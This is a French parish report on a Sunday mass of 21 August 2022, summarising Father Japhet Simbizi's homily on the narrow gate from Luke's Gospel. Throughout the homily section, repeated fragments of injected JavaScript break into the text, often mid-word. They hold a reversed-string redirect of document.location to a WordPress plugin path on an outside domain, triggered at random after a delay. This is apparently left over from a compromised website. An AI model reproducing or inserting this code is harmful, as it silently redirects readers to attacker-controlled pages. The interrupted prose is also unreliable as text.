Le Père Japhet SIMBIZI a présidé à la célébration eucharistique de ce dimanche 21 août 2022 à 10 heures, et la chorale Sancta Maria a aidé dans l’animation en chants liturgiques. Les lectures proposées pour cette journée sont respectivement le Livre du prophète Isaïe (66, 18-21), l’épitre aux Hébreux (12,7. 11-13) et l’Evangile de Jésus Christ selon saint Luc (13, 22-30). Tout au début de la messe, le Père Japhet a annoncé aux fidèles les visiteurs que le sanctuaire a eu l’honneur d’accueillir en ce jour. Il s’agissait entre autres des membres du groupe des danseurs et danseuses (Abiyerekeramana et Abatambiaramana) de la succursale Gatunguru, Paroisse Kinama et six groupes de pèlerins qui ont couronné la Vierge Marie.

Dans son homélie, le Père Japhet a commencé à préciser qu’en ce 21ème dimanche de l’année liturgique C, la Parole de Dieu nous invite à entrer par la porte étroite pour mieux franchir le royaume des cieux. Pour des gens qui ne l’entendent pas de cette oreille, Jésus leur prévient qu’il sera facile pour un cheval de passer à travers le nez d’une aiguille avant qu’un riche n’ait franchi le royaume des cieux. Nous sommes en droit de nous demander ce que tout cela veut bien dire : la porte étroite, un riche, une aiguille. En plus, d’aucuns se demandent combien de personnes auront accès au royaume des cieux. Cette question préoccupe les mémoires des personnes depuis belle lurette. Jésus lui-même a dû faire face à la même interrogation.

Jésus était en route vers Jérusalem, le dernier voyage qui le conduira à Golgotha pour sa passion qui nous a obtenu le salut. Ceci veut dire que ce voyage était différent des autres qu’il avait déjà effectués vers cet endroit. La première préoccupation de Jésus n’était pas de répondre à la question de savoir le nombre de personnes qui entreront dans le royaume mais plutôt ce que les gens toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent faire pour le mériter. Une autre précision qu’il a tenu à nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner était de nous tenir prêts car nous ne savons ni le jour ni l’heure du retour du Seigneur. Se tenir prêt pour un chrétien signifie être disciple de Jésus guidé par le Saint Esprit. En bref, le plus important pour nous est de faire la volonté du Père en tout temps et en tout lieu. Selon les dires de Jésus et les enseignements de l’Eglise, nous sommes tous appelés à la sainteté et à la vie éternelle après cette vie sur terre. Le prophète Isaïe dira au peuple d’Israël en captivité que Dieu lui-même rassemblera son peuple de tous les pays où il a été dispersé. Notre modèle à suivre et notre objectif c’est Jésus et nous n’avons pas droit aux distractions de quelque nature que ce soit.

La porte étroite toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont Jésus parle c’est la chance ou l’opportunité offerte aux personnes qui marchent loin de la lumière divine, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc dans la voie de la perdition. Ceci est vrai car nous nous reconnaissons faibles et pécheurs. Dans le passé, la ville de Jérusalem était entièrement clôturée principalement pour se protéger contre d’éventuelles attaques extérieures.  Elle avait un seul portail principal ouvert seulement pendant la journée et en temps de paix. Il y avait une autre petite porte qui était ouverte tout le temps pour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner accès à la ville aux irréguliers : les personnes qui rentraient tard dans la nuit, les personnes sans papiers, les marchands ayant beaucoup de marchandises et qui ne rentraient que tard à chaque fois, les voleurs et bien d’autres encore. Pour de tels gens, il fallait des courbes, ne pas avoir beaucoup de choses à porter et même voir une taille moins grosse. En parlant de la porte étroite, Jésus veut parler de la miséricorde divine comme opportunité supplémentaire offerte aux gens pour se repentir afin d’obtenir la grâce du partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don divin. ‘Vous aurez compris que la porte étroite nous oblige à nous courber en reconnaissance de nos irrégularités pour obtenir le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don miséricordieux de Dieu’, a martelé le Père Japhet. Au cas contraire, le prophète Isaïe nous prévient que Dieu punit celui qu’il aime quand il commet une faute, de la même manière qu’un parent punit son enfant qu’il aime. Rentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons grâce à Jésus car il a supporté nos fautes et toute la punition qui a suivi. Avec cela, nous sommes en mesure de le suivre dans la porte de la miséricorde divine. En plus, nous devons apprendre à nous supporter les uns les autres comme fils et filles d’un même Dieu et Père.  

Signalons qu’au moment de l’offertoire les personnes ayant couronné la Vierge Marie ont offert un bouquet de fleurs, des cierges allumés et des paniers en reconnaissance aux grâces reçues via cette Mère du ciel. A la fin de la messe, les mêmes personnes ont fait une procession vers le sanctuaire pour présenter leurs prières prévues en cette occasion.

NYANDWI M.